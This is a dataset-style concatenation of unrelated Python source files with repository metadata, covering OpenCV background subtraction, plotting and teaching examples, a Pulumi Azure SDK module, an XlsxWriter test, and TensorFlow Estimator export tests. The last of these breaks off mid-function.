1beabcb56dd1176bcf5845a34ee13550fc79898d | 6a612dba404176b7e180dfb2791353701c82a3bf | /processors/backsubtractors.py | bce6b46663e1146affff7a04f9cff7a61ad6f29c | [] | no_license | tulare/smile-in-the-light | d15a3e142974a055215b3eb9ac8dd1e5e57fdb1e | 1250579f015fa4cb8c4593976e27579e5ed5515d | refs/heads/master | 2020-05-27T07:57:29.617680 | 2019-06-26T10:31:39 | 2019-06-26T10:31:39 | 188,537,874 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 943 | py | # -*- encoding: utf8 -*-
import cv2 as cv
import numpy as np
from .core import FrameProcessor
__all__ = [ 'BackgroundSubtractor' ]
# ------------------------------------------------------------------------------
OPENCV_BACKSUB_ALGOS = {
'MOG2' : cv.createBackgroundSubtractorMOG2,
'KNN' : cv.createBackgroundSubtractorKNN,
}
# ------------------------------------------------------------------------------
class BackSubProcessor(FrameProcessor) :
def params(self, **kwargs) :
algo = kwargs.get('algo', 'MOG2')
try :
self.backsub = OPENCV_BACKSUB_ALGOS[algo]()
except KeyError :
self.backsub = OPENCV_BACKSUB_ALGOS['KNN']()
def apply(self, frame, context) :
fgmask = self.backsub.apply(frame)
frame = cv.bitwise_and(frame, frame, mask=fgmask)
return frame
# ------------------------------------------------------------------------------
| [
"[email protected]"
] | |
8c4480388e7fa8726898f73420d2f3df40bbf8a5 | d5f2723c879e28d1bfded4bea3c4d327a6d8c4e5 | /03_Visualizing_Data/3_histogram.py | 4ce05d1953f447a9609544f396aa265152f8f6a8 | [
"Unlicense"
] | permissive | ramalho/data-science-from-scratch | 709adb2bbef280c10edad4bdc2eb3d2a997d5e79 | 46ead47912c4a0a945decdded1999a8a4cd67b57 | refs/heads/master | 2020-12-30T23:46:40.147841 | 2017-01-28T01:01:54 | 2017-01-28T01:01:54 | 80,624,463 | 2 | 0 | null | 2017-02-01T13:52:20 | 2017-02-01T13:52:20 | null | UTF-8 | Python | false | false | 964 | py | #!/usr/bin/env python3
"""Figure 3-3. Using a bar chart for a histogram"""
import matplotlib.pyplot as plt
from collections import Counter
def make_chart_histogram():
grades = [83,95,91,87,70,0,85,82,100,67,73,77,0]
decile = lambda grade: grade // 10 * 10
histogram = Counter(decile(grade) for grade in grades)
plt.bar([x - 4 for x in histogram.keys()], # shift each bar to the left by 4
histogram.values(), # give each bar its correct height
8) # give each bar a width of 8
plt.axis([-5, 105, 0, 5]) # x-axis from -5 to 105,
# y-axis from 0 to 5
plt.xticks([10 * i for i in range(11)]) # x-axis labels at 0, 10, ..., 100
plt.xlabel("Decile")
plt.ylabel("# of Students")
plt.title("Distribution of Exam 1 Grades")
plt.show()
if __name__ == "__main__":
make_chart_histogram()
| [
"[email protected]"
] | |
9096829dbf0ff0e9494f24cf8e1132798e9fa9fa | cf6a50732d708a3a3db0f297b73cb6f449a00b44 | /Practice13_LoopingTechniques/Prac_13_13_change_code.py | 9a157c3b996983c6bd0817e18f131585525f2a57 | [] | no_license | subash319/PythonDepth | 9fe3920f4b0a25be02a9abbeeb60976853ab812e | 0de840b7776009e8e4362d059af14afaac6a8879 | refs/heads/master | 2022-11-16T03:03:56.874422 | 2020-07-17T01:19:39 | 2020-07-17T01:19:39 | 266,921,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 568 | py | # 13.
#
# data = [2,3,1,4,7,5]
# max_even = 0
# for item in data:
# if item%2==0 and item>max_even:
# max_even = item
# print(f'Largest even number is {max_even}')
# In this for loop, we are iterating over the items of a list and finding the largest even number.
#
# Make changes in this code so that you get the largest even number as well as its index.
data = [2,3,1,4,7,5]
max_even = 0
for index, item in enumerate(data):
if item%2==0 and item>max_even:
max_even = item
idx = index
print(f'Largest even number is {max_even} at index {idx}') | [
"[email protected]"
] | |
d0093035d3098ebaa03f79ae3da3b4850586ba93 | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_1_neat/16_0_1_yordan_main.py | f1df87f60260bd9647255e67663f6aa609dbebc2 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 884 | py | #!/usr/bin/env python
import sys
def digits(x):
x = abs(x)
d = []
while x:
d.append(x % 10)
x //= 10
return d or [0]
def gen(x):
i = 1
while 1:
yield x * i
i += 1
def read_input(f):
N = int(f.readline())
inputs = []
for line in f:
inputs.append(int(line))
assert len(inputs) == N
return inputs
def solve(x):
if x == 0:
return 'INSOMNIA'
mask = 0x0
for y in gen(x):
for d in digits(y):
assert d <= 10
mask |= (1 << d)
if mask == 0b1111111111:
return y
return 'Damn...'
def main():
inputs = read_input(sys.stdin)
for i, x in enumerate(inputs, start=1):
# print('i={}, x={}'.format(i, digits(x)))
print('Case #{}: {}'.format(i, solve(x)))
if __name__ == '__main__':
main()
| [
"[[email protected]]"
] | |
5d4c4aa85a2d9cdec40ea80181cfef2bfb26c1ec | a6e4a6f0a73d24a6ba957277899adbd9b84bd594 | /sdk/python/pulumi_azure_native/appconfiguration/get_private_endpoint_connection.py | f7cc2cd97bd2658bf9e3e438d054acac99b5aaaf | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | MisinformedDNA/pulumi-azure-native | 9cbd75306e9c8f92abc25be3f73c113cb93865e9 | de974fd984f7e98649951dbe80b4fc0603d03356 | refs/heads/master | 2023-03-24T22:02:03.842935 | 2021-03-08T21:16:19 | 2021-03-08T21:16:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,437 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
__all__ = [
'GetPrivateEndpointConnectionResult',
'AwaitableGetPrivateEndpointConnectionResult',
'get_private_endpoint_connection',
]
@pulumi.output_type
class GetPrivateEndpointConnectionResult:
"""
A private endpoint connection
"""
def __init__(__self__, id=None, name=None, private_endpoint=None, private_link_service_connection_state=None, provisioning_state=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if private_endpoint and not isinstance(private_endpoint, dict):
raise TypeError("Expected argument 'private_endpoint' to be a dict")
pulumi.set(__self__, "private_endpoint", private_endpoint)
if private_link_service_connection_state and not isinstance(private_link_service_connection_state, dict):
raise TypeError("Expected argument 'private_link_service_connection_state' to be a dict")
pulumi.set(__self__, "private_link_service_connection_state", private_link_service_connection_state)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
The resource ID.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="privateEndpoint")
def private_endpoint(self) -> Optional['outputs.PrivateEndpointResponse']:
"""
The resource of private endpoint.
"""
return pulumi.get(self, "private_endpoint")
@property
@pulumi.getter(name="privateLinkServiceConnectionState")
def private_link_service_connection_state(self) -> 'outputs.PrivateLinkServiceConnectionStateResponse':
"""
A collection of information about the state of the connection between service consumer and provider.
"""
return pulumi.get(self, "private_link_service_connection_state")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning status of the private endpoint connection.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the resource.
"""
return pulumi.get(self, "type")
class AwaitableGetPrivateEndpointConnectionResult(GetPrivateEndpointConnectionResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetPrivateEndpointConnectionResult(
id=self.id,
name=self.name,
private_endpoint=self.private_endpoint,
private_link_service_connection_state=self.private_link_service_connection_state,
provisioning_state=self.provisioning_state,
type=self.type)
def get_private_endpoint_connection(config_store_name: Optional[str] = None,
private_endpoint_connection_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetPrivateEndpointConnectionResult:
"""
A private endpoint connection
API Version: 2020-06-01.
:param str config_store_name: The name of the configuration store.
:param str private_endpoint_connection_name: Private endpoint connection name
:param str resource_group_name: The name of the resource group to which the container registry belongs.
"""
__args__ = dict()
__args__['configStoreName'] = config_store_name
__args__['privateEndpointConnectionName'] = private_endpoint_connection_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:appconfiguration:getPrivateEndpointConnection', __args__, opts=opts, typ=GetPrivateEndpointConnectionResult).value
return AwaitableGetPrivateEndpointConnectionResult(
id=__ret__.id,
name=__ret__.name,
private_endpoint=__ret__.private_endpoint,
private_link_service_connection_state=__ret__.private_link_service_connection_state,
provisioning_state=__ret__.provisioning_state,
type=__ret__.type)
| [
"[email protected]"
] | |
f9b5b697037e33f9f12b027bc0b5b2c9630275de | 18d223e5ea590e60bc791987034276eed2651721 | /sk1-tt/lesson2-data-processing/c4-unsupervised-learning/c42_feature_agglomerative.py | 51862d664f81bccb84812f300309511d5d5b2662 | [] | no_license | sonicfigo/tt-sklearn | 83b419b4f8984fc63ef41bf2af5b682477350992 | 8e473e958b0afc6154ba3c4dee818fd4da8f504b | refs/heads/master | 2020-03-26T16:07:59.758723 | 2018-09-25T06:28:47 | 2018-09-25T06:28:47 | 145,084,325 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,611 | py | # coding=utf-8
"""
之前用过的lasso, 用到了 sparsity 技术,可以用来解决 curse of dimensionality 问题
另一种办法:feature agglomeration, 特征聚集(对feature聚类,注意区别直接对data聚类的阶层式聚类)
正常的聚类
是根据feature,对data聚类
feature agglomeration
是数据转置,对feature进行聚类
"""
import numpy as np
import matplotlib.pyplot as plt
from sklearn import datasets, cluster
from sklearn.feature_extraction.image import grid_to_graph
digits = datasets.load_digits()
images = digits.images # 图片是 (1797, 8, 8)
X = np.reshape(images, (len(images), -1)) # (1797, 64)
connectivity = grid_to_graph(*images[0].shape) # (64, 64)
"""
开始特征聚类
"""
agglo = cluster.FeatureAgglomeration(connectivity=connectivity,
n_clusters=32)
agglo.fit(X)
"""
X (1797,64)
缩减到
X_reduced (1797, 32)
FeatureAgglomeration 实例的两个方法要关注:
1. transform
2. inverse_transform
"""
X_reduced = agglo.transform(X) # (1797, 32)
X_approx = agglo.inverse_transform(X_reduced) # (1797, 64)
images_approx = np.reshape(X_approx, images.shape) # (1797, 8, 8)
print(images_approx.shape)
IMG_INDEX = 23
plt.figure(1)
print(images[IMG_INDEX])
print(np.unique(images[IMG_INDEX]))
plt.imshow(images[IMG_INDEX])
print('\n===================肉眼看,原图像feature 64的,与压缩图像feature 32的,没什么区别啊')
plt.figure(2)
print(images_approx[IMG_INDEX])
print(np.unique(images_approx[IMG_INDEX]))
plt.imshow(images_approx[IMG_INDEX])
plt.show()
| [
"[email protected]"
] | |
5419f9bd1ab6510ad576878fcae58ddc84a24b7c | 1a114943c92a5db40034470ff31a79bcf8ddfc37 | /stdlib_exam/os-path-expandvars-example-1.py | b2b9b437176caf6eedbc4bca41e3855d1d665823 | [] | no_license | renwl/mylinux | 1924918599efd6766c266231d66b2a7ed6f6cdd1 | 0602fc6d2b0d254a8503e57310f848fc3e1a73b4 | refs/heads/master | 2020-07-10T22:12:03.259349 | 2017-01-02T12:32:04 | 2017-01-02T12:32:04 | 66,467,007 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 167 | py | import os
os.environ["USER"] = "user"
print os.path.expandvars("/home/$USER/config")
print os.path.expandvars("$USER/folders")
## /home/user/config
## user/folders
| [
"[email protected]"
] | |
f29d9ae762e6121f945faa8462bdcac0b729d598 | 9b422078f4ae22fe16610f2ebc54b8c7d905ccad | /xlsxwriter/test/vml/test_write_fill.py | 27a23de9f742660fba4a29b9a6d8916f3102aaa4 | [
"BSD-2-Clause-Views"
] | permissive | projectsmahendra/XlsxWriter | 73d8c73ea648a911deea63cb46b9069fb4116b60 | 9b9d6fb283c89af8b6c89ad20f72b8208c2aeb45 | refs/heads/master | 2023-07-21T19:40:41.103336 | 2023-07-08T16:54:37 | 2023-07-08T16:54:37 | 353,636,960 | 0 | 0 | NOASSERTION | 2021-04-01T08:57:21 | 2021-04-01T08:57:20 | null | UTF-8 | Python | false | false | 993 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2021, John McNamara, [email protected]
#
import unittest
from ...compatibility import StringIO
from ...vml import Vml
class TestWriteVfill(unittest.TestCase):
"""
Test the Vml _write_fill() method.
"""
def setUp(self):
self.fh = StringIO()
self.vml = Vml()
self.vml._set_filehandle(self.fh)
def test_write_comment_fill(self):
"""Test the _write_comment_fill() method"""
self.vml._write_comment_fill()
exp = """<v:fill color2="#ffffe1"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_button_fill(self):
"""Test the _write_button_fill() method"""
self.vml._write_button_fill()
exp = """<v:fill color2="buttonFace [67]" o:detectmouseclick="t"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
| [
"[email protected]"
] | |
4549800fa025d377dbda0dad826ebec6f702b5c0 | bad9d42860b9c85bf7316cad108cc6ff071bb705 | /tensorflow_estimator/python/estimator/export/export_test.py | 2f32f0301c4ed4b17e4f346f1176d2313ec4e036 | [
"Apache-2.0"
] | permissive | tensorflow/estimator | 1a7e469608094f17bece71867c01f22d51d28080 | 359acd5314462c05ef97f9a820d4ace876550c7e | refs/heads/master | 2023-08-17T09:54:38.668302 | 2023-08-04T00:01:29 | 2023-08-04T00:02:02 | 143,069,012 | 331 | 249 | Apache-2.0 | 2023-09-06T21:19:22 | 2018-07-31T20:55:45 | Python | UTF-8 | Python | false | false | 23,540 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for export."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from google.protobuf import text_format
from tensorflow.core.example import example_pb2
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow_estimator.python.estimator.export import export
class LabeledTensorMock(object):
"""Mock class emulating LabeledTensor."""
def __init__(self):
self.tensor = tf.constant([1])
def _convert_labeled_tensor_mock_to_tensor(value, *args, **kwargs):
return ops.internal_convert_to_tensor(value.tensor, *args, **kwargs)
tf.register_tensor_conversion_function(LabeledTensorMock,
_convert_labeled_tensor_mock_to_tensor)
class ServingInputReceiverTest(tf.test.TestCase):
def test_serving_input_receiver_constructor(self):
"""Tests that no errors are raised when input is expected."""
features = {
"feature0": tf.constant([0]),
u"feature1": tf.constant([1]),
"feature2": tf.sparse.SparseTensor(
indices=[[0, 0]], values=[1], dense_shape=[1, 1]),
# ints are allowed only in the `features` dict
42: tf.constant([3]),
}
receiver_tensors = {
"example0": tf.constant(["test0"], name="example0"),
u"example1": tf.constant(["test1"], name="example1"),
}
export.ServingInputReceiver(features, receiver_tensors)
def test_serving_input_receiver_features_invalid(self):
receiver_tensors = {
"example0": tf.constant(["test0"], name="example0"),
u"example1": tf.constant(["test1"], name="example1"),
}
with self.assertRaisesRegexp(ValueError, "features must be defined"):
export.ServingInputReceiver(
features=None, receiver_tensors=receiver_tensors)
with self.assertRaisesRegexp(ValueError,
"feature keys must be strings or ints"):
export.ServingInputReceiver(
features={42.2: tf.constant([1])}, receiver_tensors=receiver_tensors)
with self.assertRaisesRegexp(
ValueError, "feature feature1 must be a Tensor, SparseTensor, or "
"RaggedTensor."):
export.ServingInputReceiver(
features={"feature1": [1]}, receiver_tensors=receiver_tensors)
def test_serving_input_receiver_receiver_tensors_invalid(self):
features = {
"feature0": tf.constant([0]),
u"feature1": tf.constant([1]),
"feature2": tf.sparse.SparseTensor(
indices=[[0, 0]], values=[1], dense_shape=[1, 1]),
}
with self.assertRaisesRegexp(ValueError,
"receiver_tensors must be defined"):
export.ServingInputReceiver(features=features, receiver_tensors=None)
with self.assertRaisesRegexp(ValueError,
"receiver_tensor keys must be strings"):
export.ServingInputReceiver(
features=features,
receiver_tensors={1: tf.constant(["test"], name="example0")})
with self.assertRaisesRegexp(ValueError,
"receiver_tensor example1 must be a Tensor"):
export.ServingInputReceiver(
features=features, receiver_tensors={"example1": [1]})
def test_single_feature_single_receiver(self):
feature = tf.constant(5)
receiver_tensor = tf.constant(["test"])
input_receiver = export.ServingInputReceiver(feature, receiver_tensor)
# single feature is automatically named
feature_key, = input_receiver.features.keys()
self.assertEqual("feature", feature_key)
# single receiver is automatically named
receiver_key, = input_receiver.receiver_tensors.keys()
self.assertEqual("input", receiver_key)
def test_multi_feature_single_receiver(self):
features = {"foo": tf.constant(5), "bar": tf.constant(6)}
receiver_tensor = tf.constant(["test"])
_ = export.ServingInputReceiver(features, receiver_tensor)
def test_multi_feature_multi_receiver(self):
features = {"foo": tf.constant(5), "bar": tf.constant(6)}
receiver_tensors = {"baz": tf.constant(5), "qux": tf.constant(6)}
_ = export.ServingInputReceiver(features, receiver_tensors)
def test_feature_wrong_type(self):
feature = "not a tensor"
receiver_tensor = tf.constant(["test"])
with self.assertRaises(ValueError):
_ = export.ServingInputReceiver(feature, receiver_tensor)
def test_feature_labeled_tensor(self):
feature = LabeledTensorMock()
receiver_tensor = tf.constant(["test"])
_ = export.ServingInputReceiver(feature, receiver_tensor)
def test_receiver_wrong_type(self):
feature = tf.constant(5)
receiver_tensor = "not a tensor"
with self.assertRaises(ValueError):
_ = export.ServingInputReceiver(feature, receiver_tensor)
class UnsupervisedInputReceiverTest(tf.test.TestCase):
# Since this is basically a wrapper around ServingInputReceiver, we only
# have a simple sanity check to ensure that it works.
def test_unsupervised_input_receiver_constructor(self):
"""Tests that no errors are raised when input is expected."""
features = {
"feature0":
tf.constant([0]),
u"feature1":
tf.constant([1]),
"feature2":
tf.sparse.SparseTensor(
indices=[[0, 0]], values=[1], dense_shape=[1, 1]),
42: # ints are allowed only in the `features` dict
tf.constant([3]),
}
receiver_tensors = {
"example0": tf.constant(["test0"], name="example0"),
u"example1": tf.constant(["test1"], name="example1"),
}
export.UnsupervisedInputReceiver(features, receiver_tensors)
class SupervisedInputReceiverTest(tf.test.TestCase):
def test_input_receiver_constructor(self):
"""Tests that no errors are raised when input is expected."""
features = {
"feature0":
tf.constant([0]),
u"feature1":
tf.constant([1]),
"feature2":
tf.sparse.SparseTensor(
indices=[[0, 0]], values=[1], dense_shape=[1, 1]),
42: # ints are allowed in the `features` dict
tf.constant([3]),
}
labels = {
"classes": tf.constant([0] * 100),
43: # ints are allowed in the `labels` dict
tf.constant([3]),
}
receiver_tensors = {
"example0": tf.constant(["test0"], name="example0"),
u"example1": tf.constant(["test1"], name="example1"),
}
export.SupervisedInputReceiver(features, labels, receiver_tensors)
def test_input_receiver_raw_values(self):
"""Tests that no errors are raised when input is expected."""
features = {
"feature0":
tf.constant([0]),
u"feature1":
tf.constant([1]),
"feature2":
tf.sparse.SparseTensor(
indices=[[0, 0]], values=[1], dense_shape=[1, 1]),
42: # ints are allowed in the `features` dict
tf.constant([3]),
}
labels = {
"classes": tf.constant([0] * 100),
43: # ints are allowed in the `labels` dict
tf.constant([3]),
}
receiver_tensors = {
"example0": tf.constant(["test0"], name="example0"),
u"example1": tf.constant(["test1"], name="example1"),
}
rec = export.SupervisedInputReceiver(features["feature2"], labels,
receiver_tensors)
self.assertIsInstance(rec.features, tf.sparse.SparseTensor)
rec = export.SupervisedInputReceiver(features, labels["classes"],
receiver_tensors)
self.assertIsInstance(rec.labels, tf.Tensor)
def test_input_receiver_features_invalid(self):
features = tf.constant([0] * 100)
labels = tf.constant([0])
receiver_tensors = {
"example0": tf.constant(["test0"], name="example0"),
u"example1": tf.constant(["test1"], name="example1"),
}
with self.assertRaisesRegexp(ValueError, "features must be defined"):
export.SupervisedInputReceiver(
features=None, labels=labels, receiver_tensors=receiver_tensors)
with self.assertRaisesRegexp(ValueError,
"feature keys must be strings or ints"):
export.SupervisedInputReceiver(
features={1.11: tf.constant([1])},
labels=labels,
receiver_tensors=receiver_tensors)
with self.assertRaisesRegexp(ValueError,
"label keys must be strings or ints"):
export.SupervisedInputReceiver(
features=features,
labels={1.11: tf.constant([1])},
receiver_tensors=receiver_tensors)
with self.assertRaisesRegexp(
ValueError, "feature feature1 must be a Tensor, SparseTensor, or "
"RaggedTensor."):
export.SupervisedInputReceiver(
features={"feature1": [1]},
labels=labels,
receiver_tensors=receiver_tensors)
with self.assertRaisesRegexp(ValueError,
"feature must be a Tensor, SparseTensor, "
"or RaggedTensor."):
export.SupervisedInputReceiver(
features=[1], labels=labels, receiver_tensors=receiver_tensors)
with self.assertRaisesRegexp(ValueError,
"label must be a Tensor, SparseTensor, "
"or RaggedTensor."):
export.SupervisedInputReceiver(
features=features, labels=100, receiver_tensors=receiver_tensors)
def test_input_receiver_receiver_tensors_invalid(self):
features = {
"feature0":
tf.constant([0]),
u"feature1":
tf.constant([1]),
"feature2":
tf.sparse.SparseTensor(
indices=[[0, 0]], values=[1], dense_shape=[1, 1]),
}
labels = tf.constant([0])
with self.assertRaisesRegexp(ValueError,
"receiver_tensors must be defined"):
export.SupervisedInputReceiver(
features=features, labels=labels, receiver_tensors=None)
with self.assertRaisesRegexp(ValueError,
"receiver_tensor keys must be strings"):
export.SupervisedInputReceiver(
features=features,
labels=labels,
receiver_tensors={1: tf.constant(["test"], name="example0")})
with self.assertRaisesRegexp(ValueError,
"receiver_tensor example1 must be a Tensor"):
export.SupervisedInputReceiver(
features=features, labels=labels, receiver_tensors={"example1": [1]})
def test_single_feature_single_receiver(self):
feature = tf.constant(5)
label = tf.constant(5)
receiver_tensor = tf.constant(["test"])
input_receiver = export.SupervisedInputReceiver(feature, label,
receiver_tensor)
# single receiver is automatically named
receiver_key, = input_receiver.receiver_tensors.keys()
self.assertEqual("input", receiver_key)
def test_multi_feature_single_receiver(self):
features = {"foo": tf.constant(5), "bar": tf.constant(6)}
labels = {"value": tf.constant(5)}
receiver_tensor = tf.constant(["test"])
_ = export.SupervisedInputReceiver(features, labels, receiver_tensor)
def test_multi_feature_multi_receiver(self):
features = {"foo": tf.constant(5), "bar": tf.constant(6)}
labels = {"value": tf.constant(5)}
receiver_tensors = {"baz": tf.constant(5), "qux": tf.constant(6)}
_ = export.SupervisedInputReceiver(features, labels, receiver_tensors)
def test_feature_labeled_tensor(self):
feature = LabeledTensorMock()
label = tf.constant(5)
receiver_tensor = tf.constant(["test"])
_ = export.SupervisedInputReceiver(feature, label, receiver_tensor)
class ExportTest(tf.test.TestCase):
# Calling serving_input_receiver_fn requires graph mode.
@test_util.deprecated_graph_mode_only
def test_build_parsing_serving_input_receiver_fn(self):
feature_spec = {
"int_feature": tf.io.VarLenFeature(tf.dtypes.int64),
"float_feature": tf.io.VarLenFeature(tf.dtypes.float32)
}
serving_input_receiver_fn = export.build_parsing_serving_input_receiver_fn(
feature_spec)
with tf.Graph().as_default():
serving_input_receiver = serving_input_receiver_fn()
self.assertEqual(
set(["int_feature", "float_feature"]),
set(serving_input_receiver.features.keys()))
self.assertEqual(
set(["examples"]),
set(serving_input_receiver.receiver_tensors.keys()))
example = example_pb2.Example()
text_format.Parse(
"features: { "
" feature: { "
" key: 'int_feature' "
" value: { "
" int64_list: { "
" value: [ 21, 2, 5 ] "
" } "
" } "
" } "
" feature: { "
" key: 'float_feature' "
" value: { "
" float_list: { "
" value: [ 525.25 ] "
" } "
" } "
" } "
"} ", example)
with self.cached_session() as sess:
sparse_result = sess.run(
serving_input_receiver.features,
feed_dict={
serving_input_receiver.receiver_tensors["examples"].name: [
example.SerializeToString()
]
})
self.assertAllEqual([[0, 0], [0, 1], [0, 2]],
sparse_result["int_feature"].indices)
self.assertAllEqual([21, 2, 5], sparse_result["int_feature"].values)
self.assertAllEqual([[0, 0]], sparse_result["float_feature"].indices)
self.assertAllEqual([525.25], sparse_result["float_feature"].values)
# Calling serving_input_receiver_fn requires graph mode.
@test_util.deprecated_graph_mode_only
def test_build_raw_serving_input_receiver_fn_name(self):
"""Test case for issue #12755."""
f = {
"feature":
tf.compat.v1.placeholder(
name="feature", shape=[32], dtype=tf.dtypes.float32)
}
serving_input_receiver_fn = export.build_raw_serving_input_receiver_fn(f)
v = serving_input_receiver_fn()
self.assertIsInstance(v, export.ServingInputReceiver)
# Calling serving_input_receiver_fn requires graph mode.
@test_util.deprecated_graph_mode_only
def test_build_raw_serving_input_receiver_fn_without_shape(self):
"""Test case for issue #21178."""
f = {
"feature_1": tf.compat.v1.placeholder(tf.dtypes.float32),
"feature_2": tf.compat.v1.placeholder(tf.dtypes.int32)
}
serving_input_receiver_fn = export.build_raw_serving_input_receiver_fn(f)
v = serving_input_receiver_fn()
self.assertIsInstance(v, export.ServingInputReceiver)
self.assertEqual(tensor_shape.unknown_shape(),
v.receiver_tensors["feature_1"].shape)
self.assertEqual(tensor_shape.unknown_shape(),
v.receiver_tensors["feature_2"].shape)
def test_build_raw_serving_input_receiver_fn(self):
features = {
"feature_1": tf.constant(["hello"]),
"feature_2": tf.constant([42])
}
serving_input_receiver_fn = export.build_raw_serving_input_receiver_fn(
features)
with tf.Graph().as_default():
serving_input_receiver = serving_input_receiver_fn()
self.assertEqual(
set(["feature_1", "feature_2"]),
set(serving_input_receiver.features.keys()))
self.assertEqual(
set(["feature_1", "feature_2"]),
set(serving_input_receiver.receiver_tensors.keys()))
self.assertEqual(
tf.dtypes.string,
serving_input_receiver.receiver_tensors["feature_1"].dtype)
self.assertEqual(
tf.dtypes.int32,
serving_input_receiver.receiver_tensors["feature_2"].dtype)
def test_build_raw_supervised_input_receiver_fn(self):
features = {
"feature_1": tf.constant(["hello"]),
"feature_2": tf.constant([42])
}
labels = {"foo": tf.constant([5]), "bar": tf.constant([6])}
input_receiver_fn = export.build_raw_supervised_input_receiver_fn(
features, labels)
with tf.Graph().as_default():
input_receiver = input_receiver_fn()
self.assertEqual(
set(["feature_1", "feature_2"]), set(input_receiver.features.keys()))
self.assertEqual(set(["foo", "bar"]), set(input_receiver.labels.keys()))
self.assertEqual(
set(["feature_1", "feature_2", "foo", "bar"]),
set(input_receiver.receiver_tensors.keys()))
self.assertEqual(tf.dtypes.string,
input_receiver.receiver_tensors["feature_1"].dtype)
self.assertEqual(tf.dtypes.int32,
input_receiver.receiver_tensors["feature_2"].dtype)
def test_build_raw_supervised_input_receiver_fn_raw_tensors(self):
features = {
"feature_1": tf.constant(["hello"]),
"feature_2": tf.constant([42])
}
labels = {"foo": tf.constant([5]), "bar": tf.constant([6])}
input_receiver_fn1 = export.build_raw_supervised_input_receiver_fn(
features["feature_1"], labels)
input_receiver_fn2 = export.build_raw_supervised_input_receiver_fn(
features["feature_1"], labels["foo"])
with tf.Graph().as_default():
input_receiver = input_receiver_fn1()
self.assertIsInstance(input_receiver.features, tf.Tensor)
self.assertEqual(set(["foo", "bar"]), set(input_receiver.labels.keys()))
self.assertEqual(
set(["input", "foo", "bar"]),
set(input_receiver.receiver_tensors.keys()))
input_receiver = input_receiver_fn2()
self.assertIsInstance(input_receiver.features, tf.Tensor)
self.assertIsInstance(input_receiver.labels, tf.Tensor)
self.assertEqual(
set(["input", "label"]), set(input_receiver.receiver_tensors.keys()))
def test_build_raw_supervised_input_receiver_fn_batch_size(self):
features = {
"feature_1": tf.constant(["hello"]),
"feature_2": tf.constant([42])
}
labels = {"foo": tf.constant([5]), "bar": tf.constant([6])}
input_receiver_fn = export.build_raw_supervised_input_receiver_fn(
features, labels, default_batch_size=10)
with tf.Graph().as_default():
input_receiver = input_receiver_fn()
self.assertEqual([10], input_receiver.receiver_tensors["feature_1"].shape)
self.assertEqual([10], input_receiver.features["feature_1"].shape)
def test_build_raw_supervised_input_receiver_fn_overlapping_keys(self):
features = {
"feature_1": tf.constant(["hello"]),
"feature_2": tf.constant([42])
}
labels = {"feature_1": tf.constant([5]), "bar": tf.constant([6])}
with self.assertRaises(ValueError):
export.build_raw_supervised_input_receiver_fn(features, labels)
def test_build_supervised_input_receiver_fn_from_input_fn(self):
def dummy_input_fn():
return ({
"x": tf.constant([[1], [1]]),
"y": tf.constant(["hello", "goodbye"])
}, tf.constant([[1], [1]]))
input_receiver_fn = export.build_supervised_input_receiver_fn_from_input_fn(
dummy_input_fn)
with tf.Graph().as_default():
input_receiver = input_receiver_fn()
self.assertEqual(set(["x", "y"]), set(input_receiver.features.keys()))
self.assertIsInstance(input_receiver.labels, tf.Tensor)
self.assertEqual(
set(["x", "y", "label"]), set(input_receiver.receiver_tensors.keys()))
def test_build_supervised_input_receiver_fn_from_input_fn_args(self):
def dummy_input_fn(feature_key="x"):
return ({
feature_key: tf.constant([[1], [1]]),
"y": tf.constant(["hello", "goodbye"])
}, {
